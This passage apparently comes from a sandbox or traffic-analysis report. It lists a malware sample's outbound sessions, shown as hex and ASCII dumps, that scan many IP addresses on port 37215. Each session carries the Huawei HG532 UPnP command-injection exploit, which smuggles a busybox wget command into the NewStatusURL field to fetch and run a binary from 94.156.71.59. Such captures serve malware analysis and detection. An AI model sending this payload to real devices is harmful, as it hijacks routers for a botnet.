31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            1139192.168.2.134049441.184.95.18737215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.864120960 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            1140192.168.2.1348872156.83.91.17637215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.868472099 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            1141192.168.2.1350620156.246.217.11437215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.871144056 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            1142192.168.2.134036441.112.103.15637215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.873681068 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            1143192.168.2.1352804156.76.150.12137215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.876329899 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            1144192.168.2.134208841.115.229.19137215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.879390955 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            1145192.168.2.134400841.68.149.13837215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.882498026 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            1146192.168.2.1354888156.85.5.20237215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.888927937 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            1147192.168.2.1344014197.22.210.10937215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.892574072 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            1148192.168.2.1349584156.50.98.18737215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.894802094 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            1149192.168.2.1336096156.207.24.23337215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.898170948 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
